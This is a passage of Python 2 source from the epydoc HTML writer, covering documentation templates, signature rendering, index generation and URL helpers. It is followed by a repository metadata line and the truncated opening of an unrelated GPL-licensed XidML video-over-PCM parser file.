class="nomargin-top"> >>> for lhs, rhs in arg_descrs: $self.labelled_list_item(lhs, rhs)$ >>> #endfor </ul></dd> >>> #endif >>> # === return type === >>> if rdescr and rtype: <dt>Returns: $rtype$</dt> <dd>$rdescr$</dd> >>> elif rdescr: <dt>Returns:</dt> <dd>$rdescr$</dd> >>> elif rtype: <dt>Returns: $rtype$</dt> >>> #endif >>> # === decorators === >>> if func_doc.decorators not in (None, UNKNOWN): >>> # (staticmethod & classmethod are already shown, above) >>> decos = filter(lambda deco: >>> not ((deco=="staticmethod" and >>> isinstance(func_doc, StaticMethodDoc)) or >>> (deco=="classmethod" and >>> isinstance(func_doc, ClassMethodDoc))), >>> func_doc.decorators) >>> else: >>> decos = None >>> #endif >>> if decos: <dt>Decorators:</dt> <dd><ul class="nomargin-top"> >>> for deco in decos: <li><code>@$deco$</code></li> >>> #endfor </ul></dd> >>> #endif >>> # === exceptions === >>> if func_doc.exception_descrs not in (None, UNKNOWN, (), []): <dt>Raises:</dt> <dd><ul class="nomargin-top"> >>> for name, descr in func_doc.exception_descrs: >>> exc_name = self.docindex.find(name, func_doc) >>> if exc_name is not None: >>> name = self.href(exc_name, label=str(name)) >>> #endif $self.labelled_list_item( "<code><strong class=\'fraise\'>" + str(name) + "</strong></code>", self.docstring_to_html(descr, func_doc, 8))$ >>> #endfor </ul></dd> >>> #endif >>> # === overrides === >>> if var_doc.overrides not in (None, UNKNOWN): <dt>Overrides: >>> # Avoid passing GenericValueDoc to href() >>> if isinstance(var_doc.overrides.value, RoutineDoc): $self.href(var_doc.overrides.value, context=var_doc)$ >>> else: >>> # In this case, a less interesting label is generated. $self.href(var_doc.overrides, context=var_doc)$ >>> #endif >>> if (func_doc.docstring in (None, UNKNOWN) and >>> var_doc.overrides.value.docstring not in (None, UNKNOWN)): <dd><em class="note">(inherited documentation)</em></dd> >>> #endif </dt> >>> #endif </dl> >>> # === metadata === >>> self.write_standard_fields(out, func_doc) </td></tr></table> </div> ''') # \------------------------------------------------------------/ # Names for the __special__ methods. SPECIAL_METHODS ={ '__init__': 'Constructor', '__del__': 'Destructor', '__add__': 'Addition operator', '__sub__': 'Subtraction operator', '__and__': 'And operator', '__or__': 'Or operator', '__xor__': 'Exclusive-Or operator', '__repr__': 'Representation operator', '__call__': 'Call operator', '__getattr__': 'Qualification operator', '__getitem__': 'Indexing operator', '__setitem__': 'Index assignment operator', '__delitem__': 'Index deletion operator', '__delslice__': 'Slice deletion operator', '__setslice__': 'Slice assignment operator', '__getslice__': 'Slicling operator', '__len__': 'Length operator', '__cmp__': 'Comparison operator', '__eq__': 'Equality operator', '__in__': 'Containership operator', '__gt__': 'Greater-than operator', '__lt__': 'Less-than operator', '__ge__': 'Greater-than-or-equals operator', '__le__': 'Less-than-or-equals operator', '__radd__': 'Right-side addition operator', '__hash__': 'Hashing function', '__contains__': 'In operator', '__nonzero__': 'Boolean test operator', '__str__': 'Informal representation operator', } write_property_details_entry = compile_template( ''' write_property_details_entry(self, out, var_doc, descr, \ accessors, div_class) ''', # /------------------------- Template -------------------------\ ''' >>> prop_doc = var_doc.value <a name="$var_doc.name$"></a> <div$div_class$> >>> self.write_table_header(out, "details") <tr><td> <h3 class="epydoc">$var_doc.name$</h3> $descr$ <dl class="fields"> >>> for (name, val, summary) in accessors: <dt>$name$ Method:</dt> <dd class="value">$val$ >>> if summary: - $summary$ >>> #endif </dd> >>> #endfor >>> if prop_doc.type_descr not in (None, UNKNOWN): <dt>Type:</dt> <dd>$self.type_descr(var_doc, indent=6)$</dd> >>> #endif </dl> >>> self.write_standard_fields(out, prop_doc) </td></tr></table> </div> ''') # \------------------------------------------------------------/ write_variable_details_entry = compile_template( ''' write_variable_details_entry(self, out, var_doc, descr, div_class) ''', # /------------------------- Template -------------------------\ ''' <a name="$var_doc.name$"></a> <div$div_class$> >>> self.write_table_header(out, "details") <tr><td> <h3 class="epydoc">$var_doc.name$</h3> $descr$ <dl class="fields"> >>> if var_doc.type_descr not in (None, UNKNOWN): <dt>Type:</dt> <dd>$self.type_descr(var_doc, indent=6)$</dd> >>> #endif </dl> >>> self.write_standard_fields(out, var_doc) >>> if var_doc.value is not UNKNOWN: <dl class="fields"> <dt>Value:</dt> <dd>$self.pprint_value(var_doc.value)$</dd> </dl> >>> #endif </td></tr></table> </div> ''') # \------------------------------------------------------------/ def variable_tooltip(self, var_doc): if var_doc.value in (None, UNKNOWN): return '' s = var_doc.value.pyval_repr().to_plaintext(None) if len(s) > self._variable_tooltip_linelen: s = s[:self._variable_tooltip_linelen-3]+'...' return ' title="%s"' % plaintext_to_html(s) def pprint_value(self, val_doc): if val_doc is UNKNOWN: return '??' elif isinstance(val_doc, GenericValueDoc): return ('<table><tr><td><pre class="variable">\n' + val_doc.pyval_repr().to_html(None) + '\n</pre></td></tr></table>\n') else: return self.href(val_doc) #//////////////////////////////////////////////////////////// #{ Base Tree #//////////////////////////////////////////////////////////// def base_tree(self, doc, width=None, postfix='', context=None): """ @return: The HTML code for a class's base tree. The tree is drawn 'upside-down' and right justified, to allow for multiple inheritance. @rtype: C{string} """ if context is None: context = doc.defining_module if width == None: width = self.find_tree_width(doc, context) if isinstance(doc, ClassDoc) and doc.bases != UNKNOWN: bases = doc.bases else: bases = [] if postfix == '': # [XX] use var name instead of canonical name? s = (' '*(width-2) + '<strong class="uidshort">'+ self.contextual_label(doc, context)+'</strong>\n') else: s = '' for i in range(len(bases)-1, -1, -1): base = bases[i] label = self.contextual_label(base, context) s = (' '*(width-4-len(label)) + self.href(base, label) +' --+'+postfix+'\n' + ' '*(width-4) + ' |'+postfix+'\n' + s) if i != 0: s = (self.base_tree(base, width-4, ' |'+postfix, context)+s) else: s = (self.base_tree(base, width-4, ' '+postfix, context)+s) return s def find_tree_width(self, doc, context): """ Helper function for L{base_tree}. @return: The width of a base tree, when drawn right-justified. This is used by L{base_tree} to determine how far to indent lines of the base tree. @rtype: C{int} """ if not isinstance(doc, ClassDoc): return 2 if doc.bases == UNKNOWN: return 2 width = 2 for base in doc.bases: width = max(width, len(self.contextual_label(base, context))+4, self.find_tree_width(base, context)+4) return width def contextual_label(self, doc, context): """ Return the label for C{doc} to be shown in C{context}. """ if doc.canonical_name is None: if doc.parse_repr is not None: return doc.parse_repr else: return '??' else: if context is UNKNOWN: return str(doc.canonical_name) else: context_name = context.canonical_name return str(doc.canonical_name.contextualize(context_name)) #//////////////////////////////////////////////////////////// #{ Function Signatures #//////////////////////////////////////////////////////////// def function_signature(self, api_doc, is_summary=False, link_name=False, anchor=False, context=None): """Render a function signature in HTML. @param api_doc: The object whose name is to be rendered. If a C{VariableDoc}, its C{value} should be a C{RoutineDoc} @type api_doc: L{VariableDoc} or L{RoutineDoc} @param is_summary: True if the fuction is to be rendered in the summary. type css_class: C{bool} @param link_name: If True, the name is a link to the object anchor. @type link_name: C{bool} @param anchor: If True, the name is the object anchor. @type anchor: C{bool} @param context: If set, represent the function name from this context. Only useful when C{api_doc} is a L{RoutineDoc}. @type context: L{DottedName} @return: The HTML code for the object. @rtype: C{str} """ if is_summary: css_class = 'summary-sig' else: css_class = 'sig' # [XX] clean this up! if isinstance(api_doc, VariableDoc): func_doc = api_doc.value # This should never happen, but just in case: if api_doc.value in (None, UNKNOWN): return (('<span class="%s"><span class="%s-name">%s'+ '</span>(...)</span>') % (css_class, css_class, api_doc.name)) # Get the function's name. name = self.summary_name(api_doc, css_class=css_class+'-name', link_name=link_name, anchor=anchor) else: func_doc = api_doc name = self.href(api_doc, css_class=css_class+'-name', context=context) if func_doc.posargs == UNKNOWN: args = ['...'] else: args = [self.func_arg(n, d, css_class) for (n, d) in zip(func_doc.posargs, func_doc.posarg_defaults)] if func_doc.vararg not in (None, UNKNOWN): if func_doc.vararg == '...': args.append('<span class="%s-arg">...</span>' % css_class) else: args.append('<span class="%s-arg">*%s</span>' % (css_class, func_doc.vararg)) if func_doc.kwarg not in (None, UNKNOWN): args.append('<span class="%s-arg">**%s</span>' % (css_class, func_doc.kwarg)) return ('<span class="%s">%s(%s)</span>' % (css_class, name, ',\n '.join(args))) def summary_name(self, api_doc, css_class='summary-name', link_name=False, anchor=False): """Render an object name in HTML. @param api_doc: The object whose name is to be rendered @type api_doc: L{APIDoc} @param css_class: The CSS class to assign to the rendered name type css_class: C{str} @param link_name: If True, the name is a link to the object anchor. @type link_name: C{bool} @param anchor: If True, the name is the object anchor. @type anchor: C{bool} @return: The HTML code for the object. @rtype: C{str} """ if anchor: rv = '<a name="%s"></a>' % api_doc.name else: rv = '' if link_name: rv += self.href(api_doc, css_class=css_class) else: rv += '<span class="%s">%s</span>' % (css_class, api_doc.name) return rv # [xx] tuple args??? def func_arg(self, name, default, css_class): name = self._arg_name(name) s = '<span class="%s-arg">%s</span>' % (css_class, name) if default is not None: s += ('=<span class="%s-default">%s</span>' % (css_class, default.summary_pyval_repr().to_html(None))) return s def _arg_name(self, arg): if isinstance(arg, basestring): return arg elif len(arg) == 1: return '(%s,)' % self._arg_name(arg[0]) else: return '(%s)' % (', '.join([self._arg_name(a) for a in arg])) #//////////////////////////////////////////////////////////// #{ Import Lists #//////////////////////////////////////////////////////////// def write_imports(self, out, doc): assert isinstance(doc, NamespaceDoc) imports = doc.select_variables(imported=True, public=self._public_filter) if not imports: return out('<p class="indent-wrapped-lines">') out('<b>Imports:</b>\n ') out(',\n '.join([self._import(v, doc) for v in imports])) out('\n</p><br />\n') def _import(self, var_doc, context): if var_doc.imported_from not in (None, UNKNOWN): return self.href(var_doc.imported_from, var_doc.name, context=context, tooltip='%s' % var_doc.imported_from) elif (var_doc.value not in (None, UNKNOWN) and not isinstance(var_doc.value, GenericValueDoc)): return self.href(var_doc.value, var_doc.name, context=context, tooltip='%s' % var_doc.value.canonical_name) else: return plaintext_to_html(var_doc.name) #//////////////////////////////////////////////////////////// #{ Function Attributes #//////////////////////////////////////////////////////////// #//////////////////////////////////////////////////////////// #{ Module Trees #//////////////////////////////////////////////////////////// def write_module_list(self, out, doc): if len(doc.submodules) == 0: return self.write_table_header(out, "summary", "Submodules") for group_name in doc.group_names(): if not doc.submodule_groups[group_name]: continue if group_name: self.write_group_header(out, group_name) out(' <tr><td class="summary">\n' ' <ul class="nomargin">\n') for submodule in doc.submodule_groups[group_name]: self.write_module_tree_item(out, submodule, package=doc) out(' </ul></td></tr>\n') out(self.TABLE_FOOTER+'\n<br />\n') def write_module_tree_item(self, out, doc, package=None): # If it's a private variable, then mark its <li>. var = package and package.variables.get(doc.canonical_name[-1]) priv = ((var is not None and var.is_public is False) or (var is None and doc.canonical_name[-1].startswith('_'))) out(' <li%s> <strong class="uidlink">%s</strong>' % (priv and ' class="private"' or '', self.href(doc))) if doc.summary not in (None, UNKNOWN): out(': <em class="summary">'+ self.description(doc.summary, doc, 8)+'</em>') if doc.submodules != UNKNOWN and doc.submodules: if priv: out('\n <ul class="private">\n') else: out('\n <ul>\n') for submodule in doc.submodules: self.write_module_tree_item(out, submodule, package=doc) out(' </ul>\n') out(' </li>\n') #//////////////////////////////////////////////////////////// #{ Class trees #//////////////////////////////////////////////////////////// write_class_tree_item = compile_template( ''' write_class_tree_item(self, out, doc, class_set) ''', # /------------------------- Template -------------------------\ ''' >>> if doc.summary in (None, UNKNOWN): <li> <strong class="uidlink">$self.href(doc)$</strong> >>> else: <li> <strong class="uidlink">$self.href(doc)$</strong>: <em class="summary">$self.description(doc.summary, doc, 8)$</em> >>> # endif >>> if doc.subclasses: <ul> >>> for subclass in sorted(set(doc.subclasses), key=lambda c:c.canonical_name[-1]): >>> if subclass in class_set: >>> self.write_class_tree_item(out, subclass, class_set) >>> #endif >>> #endfor </ul> >>> #endif </li> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ Standard Fields #//////////////////////////////////////////////////////////// def write_standard_fields(self, out, doc): """ Write HTML code containing descriptions of any standard markup fields that are defined by the given L{APIDoc} object (such as C{@author} and C{@todo} fields). @param doc: The L{APIDoc} object containing the API documentation for the object whose standard markup fields should be described. """ fields = [] field_values = {} for (field, arg, descr) in doc.metadata: if field not in field_values: fields.append(field) if field.takes_arg: subfields = field_values.setdefault(field,{}) subfields.setdefault(arg,[]).append(descr) else: field_values.setdefault(field,[]).append(descr) if not fields: return out('<div class="fields">') for field in fields: if field.takes_arg: for arg, descrs in field_values[field].items(): self.write_standard_field(out, doc, field, descrs, arg) else: self.write_standard_field(out, doc, field, field_values[field]) out('</div>') write_standard_field = compile_template( """ write_standard_field(self, out, doc, field, descrs, arg='') """, # /------------------------- Template -------------------------\ ''' >>> if arg: arglabel = " (%s)" % arg >>> else: arglabel = "" >>> if len(descrs) == 1: <p><strong>$field.singular+arglabel$:</strong> $self.description(descrs[0], doc, 8)$ </p> >>> elif field.short: <dl><dt>$field.plural+arglabel$:</dt> <dd> >>> for descr in descrs[:-1]: $self.description(descr, doc, 10)$, >>> # end for $self.description(descrs[-1], doc, 10)$ </dd> </dl> >>> else: <strong>$field.plural+arglabel$:</strong> <ul class="nomargin-top"> >>> for descr in descrs: <li> $self.description(descr, doc, 8)$ </li> >>> # end for </ul> >>> # end else >>> # end for ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ Index generation #//////////////////////////////////////////////////////////// #: A list of metadata indices that should be generated. Each #: entry in this list is a tuple C{(tag, label, short_label)}, #: where C{tag} is the cannonical tag of a metadata field; #: C{label} is a label for the index page; and C{short_label} #: is a shorter label, used in the index selector. METADATA_INDICES = [('bug', 'Bug List', 'Bugs'), ('todo', 'To Do List', 'To Do'), ('change', 'Change Log', 'Changes'), ('deprecated', 'Deprecation List', 'Deprecations'), ('since', 'Introductions List', 'Introductions'), ] def build_identifier_index(self): items = [] for doc in self.indexed_docs: name = plaintext_to_html(doc.canonical_name[-1]) if isinstance(doc, RoutineDoc): name += '()' url = self.url(doc) if not url: continue container = self.docindex.container(doc) items.append( (name, url, container) ) return sorted(items, key=lambda v:v[0].lower()) def _group_by_letter(self, items): """Preserves sort order of the input.""" index = {} for item in items: first_letter = item[0][0].upper() if not ("A" <= first_letter <= "Z"): first_letter = '_' index.setdefault(first_letter, []).append(item) return index def build_term_index(self): items = [] for doc in self.indexed_docs: url = self.url(doc) items += self._terms_from_docstring(url, doc, doc.descr) for (field, arg, descr) in doc.metadata: items += self._terms_from_docstring(url, doc, descr) if hasattr(doc, 'type_descr'): items += self._terms_from_docstring(url, doc, doc.type_descr) if hasattr(doc, 'return_descr'): items += self._terms_from_docstring(url, doc, doc.return_descr) if hasattr(doc, 'return_type'): items += self._terms_from_docstring(url, doc, doc.return_type) return sorted(items, key=lambda v:v[0].lower()) def _terms_from_docstring(self, base_url, container, parsed_docstring): if parsed_docstring in (None, UNKNOWN): return [] terms = [] # Strip any existing anchor off: base_url = re.sub('#.*', '', '%s' % (base_url,)) for term in parsed_docstring.index_terms(): anchor = self._term_index_to_anchor(term) url = '%s#%s' % (base_url, anchor) terms.append( (term.to_plaintext(None), url, container) ) return terms def build_metadata_index(self, field_name): # Build the index. index = {} for doc in self.indexed_docs: if (not self._show_private and self._doc_or_ancestor_is_private(doc)): continue descrs = {} if doc.metadata is not UNKNOWN: for (field, arg, descr) in doc.metadata: if field.tags[0] == field_name: descrs.setdefault(arg, []).append(descr) for (arg, descr_list) in descrs.iteritems(): index.setdefault(arg, []).append( (doc, descr_list) ) return index def _term_index_to_anchor(self, term): """ Given the name of an inline index item, construct a URI anchor. These anchors are used to create links from the index page to each index item. """ # Include "-" so we don't accidentally collide with the name # of a python identifier. s = re.sub(r'\s\s+', '-', term.to_plaintext(None)) return "index-"+re.sub("[^a-zA-Z0-9]", "_", s) #//////////////////////////////////////////////////////////// #{ Redirect page #//////////////////////////////////////////////////////////// def write_redirect_page(self, out): """ Build the auto-redirect page, which translates dotted names to URLs using javascript. When the user visits <redirect.html#dotted.name>, they will automatically get redirected to the page for the object with the given fully-qualified dotted name. E.g., for epydoc, <redirect.html#epydoc.apidoc.UNKNOWN> redirects the user to <epydoc.apidoc-module.html#UNKNOWN>. """ # Construct a list of all the module & class pages that we're # documenting. The redirect_url javascript will scan through # this list, looking for a page name that matches the # requested dotted name. pages = (['%s-m' % val_doc.canonical_name for val_doc in self.module_list] + ['%s-c' % val_doc.canonical_name for val_doc in self.class_list]) # Sort the pages from longest to shortest. This ensures that # we find e.g. "x.y.z" in the list before "x.y". pages = sorted(pages, key=lambda p:-len(p)) # Write the redirect page. self._write_redirect_page(out, pages) _write_redirect_page = compile_template( ''' _write_redirect_page(self, out, pages) ''', # /------------------------- Template -------------------------\ ''' <html><head><title>Epydoc Redirect Page</title> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="pragma" content="no-cache" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body> <script type="text/javascript"> <!-- var pages = $"[%s]" % ", ".join(['"%s"' % v for v in pages])$; var dottedName = get_anchor(); if (dottedName) { var target = redirect_url(dottedName); if (target) window.location.replace(target); } // --> </script> <h3>Epydoc Auto-redirect page</h3> <p>When javascript is enabled, this page will redirect URLs of the form <tt>redirect.html#<i>dotted.name</i></tt> to the documentation for the object with the given fully-qualified dotted name.</p> <p><a id="message"> &nbsp; </a></p> <script type="text/javascript"> <!-- if (dottedName) { var msg = document.getElementById("message"); msg.innerHTML = "No documentation found for <tt>"+ dottedName+"</tt>"; } // --> </script> </body> </html> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ URLs list #//////////////////////////////////////////////////////////// def write_api_list(self, out): """ Write a list of mapping name->url for all the documented objects. """ # Construct a list of all the module & class pages that we're # documenting. The redirect_url javascript will scan through # this list, looking for a page name that matches the # requested dotted name. skip = (ModuleDoc, ClassDoc, type(UNKNOWN)) for val_doc in self.module_list: self.write_url_record(out, val_doc) for var in val_doc.variables.itervalues(): if not isinstance(var.value, skip): self.write_url_record(out, var) for val_doc in self.class_list: self.write_url_record(out, val_doc) for var in val_doc.variables.itervalues(): self.write_url_record(out, var) def write_url_record(self, out, obj): url = self.url(obj) if url is not None: out("%s\t%s\n" % (obj.canonical_name, url)) #//////////////////////////////////////////////////////////// #{ Helper functions #//////////////////////////////////////////////////////////// def _val_is_public(self, valdoc): """Make a best-guess as to whether the given class is public.""" container = self.docindex.container(valdoc) if isinstance(container, NamespaceDoc): for vardoc in container.variables.values(): if vardoc in (UNKNOWN, None): continue if vardoc.value is valdoc: return vardoc.is_public return True # [XX] Is it worth-while to pull the anchor tricks that I do here? # Or should I just live with the fact that show/hide private moves # stuff around? write_table_header = compile_template( ''' write_table_header(self, out, css_class, heading=None, \ private_link=True, colspan=2) ''', # /------------------------- Template -------------------------\ ''' >>> if heading is not None: >>> anchor = "section-%s" % re.sub("\W", "", heading) <!-- ==================== $heading.upper()$ ==================== --> <a name="$anchor$"></a> >>> #endif <table class="$css_class$" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> >>> if heading is not None: <tr bgcolor="#70b0f0" class="table-header"> >>> if private_link and self._show_private: <td colspan="$colspan$" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">$heading$</span></td> <td align="right" valign="top" ><span class="options">[<a href="#$anchor$" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> >>> else: <td align="left" colspan="2" class="table-header"> <span class="table-header">$heading$</span></td> >>> #endif </tr> >>> #endif ''') # \------------------------------------------------------------/ TABLE_FOOTER = '</table>\n' PRIVATE_LINK = ''' <span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span> '''.strip() write_group_header = compile_template( ''' write_group_header(self, out, group, tr_class='') ''', # /------------------------- Template -------------------------\ ''' <tr bgcolor="#e8f0f8" $tr_class$> <th colspan="2" class="group-header" >&nbsp;&nbsp;&nbsp;&nbsp;$group$</th></tr> ''') # \------------------------------------------------------------/ _url_cache = {} def url(self, obj): """ Return the URL for the given object, which can be a C{VariableDoc}, a C{ValueDoc}, or a C{DottedName}. """ cached_url = self._url_cache.get(id(obj)) if cached_url is not None: return cached_url else: url = self._url_cache[id(obj)] = self._url(obj) return url def _url(self, obj): """ Internal helper for L{url}. """ # Module: <canonical_name>-module.html if isinstance(obj, ModuleDoc): if obj not in self.module_set: return None return urllib.quote('%s'%obj.canonical_name) + '-module.html' # Class: <canonical_name>-class.html elif isinstance(obj, ClassDoc): if obj not in self.class_set: return None return urllib.quote('%s'%obj.canonical_name) + '-class.html' # Variable elif isinstance(obj, VariableDoc): val_doc = obj.value if isinstance(val_doc, (ModuleDoc, ClassDoc)): return self.url(val_doc) elif obj.container in (None, UNKNOWN): if val_doc in (None, UNKNOWN): return None return self.url(val_doc) elif obj.is_imported == True: if obj.imported_from is not UNKNOWN: return self.url(obj.imported_from) else: return None else: container_url = self.url(obj.container) if container_url is None: return None return '%s#%s' % (container_url, urllib.quote('%s'%obj.name)) # Value (other than module or class) elif isinstance(obj, ValueDoc): container = self.docindex.container(obj) if container is None: return None # We couldn't find it! else: container_url = self.url(container) if container_url is None: return None anchor = urllib.quote('%s'%obj.canonical_name[-1]) return '%s#%s' % (container_url, anchor) # Dotted name: look up the corresponding APIDoc elif isinstance(obj, DottedName): val_doc = self.docindex.get_valdoc(obj) if val_doc is None: return None return self.url(val_doc) # Special pages: elif obj == 'indices': return 'identifier-index.html' elif obj == 'help': return 'help.html' elif obj == 'trees': return self._trees_url else: raise ValueError, "Don't know what to do with %r" % obj def pysrc_link(self, api_doc): if not self._incl_sourcecode: return '' url = self.pysrc_url(api_doc) if url is not None: return ('<span class="codelink"><a href="%s">source&nbsp;' 'code</a></span>' % url) else: return '' def pysrc_url(self, api_doc): if isinstance(api_doc, VariableDoc): if api_doc.value not in (None, UNKNOWN): return pysrc_url(api_doc.value) else: return None elif isinstance(api_doc, ModuleDoc): if api_doc in self.modules_with_sourcecode: return ('%s-pysrc.html' % urllib.quote('%s' % api_doc.canonical_name)) else: return None else: module = api_doc.defining_module if module == UNKNOWN: return None module_pysrc_url = self.pysrc_url(module) if module_pysrc_url is None: return None module_name = module.canonical_name if not module_name.dominates(api_doc.canonical_name, True): log.debug('%r is in %r but name does not dominate' % (api_doc, module)) return module_pysrc_url mname_len = len(module.canonical_name) anchor = '%s' % api_doc.canonical_name[mname_len:] return '%s#%s' % (module_pysrc_url, urllib.quote(anchor)) # We didn't find it: return None # [xx] add code to automatically do <code> wrapping or the like? def href(self, target, label=None, css_class=None, context=None, tooltip=None): """ Return the HTML code for an HREF link to the given target (which can be a C{VariableDoc}, a C{ValueDoc}, or a C{DottedName}. If a C{NamespaceDoc} C{context} is specified, the target label is contextualized to it. """ assert isinstance(target, (APIDoc, DottedName)) # Pick a label, if none was given. if label is None: if isinstance(target, VariableDoc): label = target.name elif (isinstance(target, ValueDoc) and target.canonical_name is not UNKNOWN): label = target.canonical_name elif isinstance(target, DottedName): label = target elif isinstance(target, GenericValueDoc): raise ValueError("href() should not be called with " "GenericValueDoc objects (perhaps you " "meant to use the containing variable?)") else: raise ValueError("Unable to find a label for %r" % target) if context is not None and isinstance(label, DottedName): label = label.contextualize(context.canonical_name.container()) label = plaintext_to_html(str(label)) # Munge names for scripts & unreachable values if label.startswith('script-'): label = label[7:] + ' (script)' if label.startswith('??'): label = '<i>unreachable</i>' + label[2:] label = re.sub(r'-\d+$', '', label) # Get the url for the target. url = self.url(target) if url is None: if tooltip: return '<span title="%s">%s</span>' % (tooltip, label) else: return label # Construct a string for the class attribute. if css_class is None: css = '' else: css = ' class="%s"' % css_class onclick = '' if ((isinstance(target, VariableDoc) and not target.is_public) or (isinstance(target, ValueDoc) and not isinstance(target, GenericValueDoc) and not self._val_is_public(target))): onclick = ' onclick="show_private();"' if tooltip: tooltip = ' title="%s"' % tooltip else: tooltip = '' return '<a href="%s"%s%s%s>%s</a>' % (url, css, onclick, tooltip, label) def _attr_to_html(self, attr, api_doc, indent): if api_doc in (None, UNKNOWN): return '' pds = getattr(api_doc, attr, None) # pds = ParsedDocstring. if pds not in (None, UNKNOWN): return self.docstring_to_html(pds, api_doc, indent) elif isinstance(api_doc, VariableDoc): return self._attr_to_html(attr, api_doc.value, indent) def summary(self, api_doc, indent=0): return self._attr_to_html('summary', api_doc, indent) def descr(self, api_doc, indent=0): return self._attr_to_html('descr', api_doc, indent) def type_descr(self, api_doc, indent=0): return self._attr_to_html('type_descr', api_doc, indent) def return_type(self, api_doc, indent=0): return self._attr_to_html('return_type', api_doc, indent) def return_descr(self, api_doc, indent=0): return self._attr_to_html('return_descr', api_doc, indent) def docstring_to_html(self, parsed_docstring, where=None, indent=0): if parsed_docstring in (None, UNKNOWN): return '' linker = _HTMLDocstringLinker(self, where) s = parsed_docstring.to_html(linker, indent=indent, directory=self._directory, docindex=self.docindex, context=where).strip() if self._mark_docstrings: s = '<span class="docstring">%s</span><!--end docstring-->' % s return s def description(self, parsed_docstring, where=None, indent=0): assert isinstance(where, (APIDoc, type(None))) if parsed_docstring in (None, UNKNOWN): return '' linker = _HTMLDocstringLinker(self, where) descr = parsed_docstring.to_html(linker, indent=indent, directory=self._directory, docindex=self.docindex, context=where).strip() if descr == '': return '&nbsp;' return descr # [xx] Should this be defined by the APIDoc classes themselves?? def doc_kind(self, doc): if isinstance(doc, ModuleDoc) and doc.is_package == True: return 'Package' elif (isinstance(doc, ModuleDoc) and doc.canonical_name[0].startswith('script')): return 'Script' elif isinstance(doc, ModuleDoc): return 'Module' elif isinstance(doc, ClassDoc): return 'Class' elif isinstance(doc, ClassMethodDoc): return 'Class Method' elif isinstance(doc, StaticMethodDoc): return 'Static Method' elif isinstance(doc, RoutineDoc): if isinstance(self.docindex.container(doc), ClassDoc): return 'Method' else: return 'Function' else: return 'Variable' def _doc_or_ancestor_is_private(self, api_doc): name = api_doc.canonical_name for i in range(len(name), 0, -1): # Is it (or an ancestor) a private var? var_doc = self.docindex.get_vardoc(name[:i]) if var_doc is not None and var_doc.is_public == False: return True # Is it (or an ancestor) a private module? val_doc = self.docindex.get_valdoc(name[:i]) if (val_doc is not None and isinstance(val_doc, ModuleDoc) and val_doc.canonical_name[-1].startswith('_')): return True return False def _private_subclasses(self, class_doc): """Return a list of all subclasses of the given class that are private, as determined by L{_val_is_private}. Recursive subclasses are included in this list.""" queue = [class_doc] private = set() for cls in queue: if (isinstance(cls, ClassDoc) and cls.subclasses not in (None, UNKNOWN)): queue.extend(cls.subclasses) private.update([c for c in cls.subclasses if not self._val_is_public(c)]) return private class _HTMLDocstringLinker(epydoc.markup.DocstringLinker): def __init__(self, htmlwriter, container): self.htmlwriter = htmlwriter self.docindex = htmlwriter.docindex self.container = container def translate_indexterm(self, indexterm): key = self.htmlwriter._term_index_to_anchor(indexterm) return ('<a name="%s"></a><i class="indexterm">%s</i>' % (key, indexterm.to_html(self))) def translate_identifier_xref(self, identifier, label=None): # Pick a label for this xref. if label is None: label = plaintext_to_html(identifier) # Find the APIDoc for it (if it's available). doc = self.docindex.find(identifier, self.container) # If we didn't find a target, then try checking in the contexts # of the ancestor classes. if doc is None and isinstance(self.container, RoutineDoc): container = self.docindex.get_vardoc( self.container.canonical_name) while (doc is None and container not in (None, UNKNOWN) and container.overrides not in (None, UNKNOWN)): container = container.overrides doc = self.docindex.find(identifier, container) # Translate it into HTML. if doc is None: self._failed_xref(identifier) return '<code class="link">%s</code>' % label else: return self.htmlwriter.href(doc, label, 'link') # [xx] Should this be added to the DocstringLinker interface??? # Currently, this is *only* used by dotgraph. def url_for(self, identifier): if isinstance(identifier, (basestring, DottedName)): doc = self.docindex.find(identifier, self.container) if doc: return self.htmlwriter.url(doc) else: return None elif isinstance(identifier, APIDoc): return self.htmlwriter.url(identifier) doc = identifier else: raise TypeError('Expected string or APIDoc') def _failed_xref(self, identifier): """Add an identifier to the htmlwriter's failed crossreference list.""" # Don't count it as a failed xref if it's a parameter of the # current function. if (isinstance(self.container, RoutineDoc) and identifier in self.container.all_args()): return failed_xrefs = self.htmlwriter._failed_xrefs context = self.container.canonical_name failed_xrefs.setdefault(identifier,{})[context] = 1
apache-2.0
diarmuidcwc/GTSVideoDecom
VidOverPCM.py
1
12132
#------------------------------------------------------------------------------- # Name: VidOverPCM # Purpose: # # Copyright 2014 Diarmuid Collins dcollins@curtisswright.com # https://github.com/diarmuid # # # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import xml.etree.ElementTree as etree import re import array import struct import math import logging def natural_sort(l): convert = lambda text: int(text) if text.isdigit() else text.lower() alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] return sorted(l, key = alphanum_key) class VidOverPCM(): def __init__(self): self.xidml = None self.xidmlVersion = "2.41" self.tree = None self.root = None self.vids = dict() self.vidInstruments = {"KAD/VID/106","KAD/VID/103"} # Hard code these for the moment but they can be pulled from the xidml self.minorFrameOffsetBits = 32 self.minorFramesPerMajorFrames =1 self.dataBitsPerWord = 16 self.vidsPerXidml = list() # Internal only self._maxWordOffset = 0 self._parameterOfInterestRE = "_VIDEO_" self._parameterReferenceVendorOfInterestRE = "MPEG2TS|Video" self._allVidParams = dict() def parseXidml(self,xidml): '''Parse a xidml2.4 file and setup the VidOverPCM class :type xidml: str ''' try: self.tree = etree.parse(xidml) self.root = self.tree.getroot() self.parent_map ={c:p for p in self.tree.iter() for c in 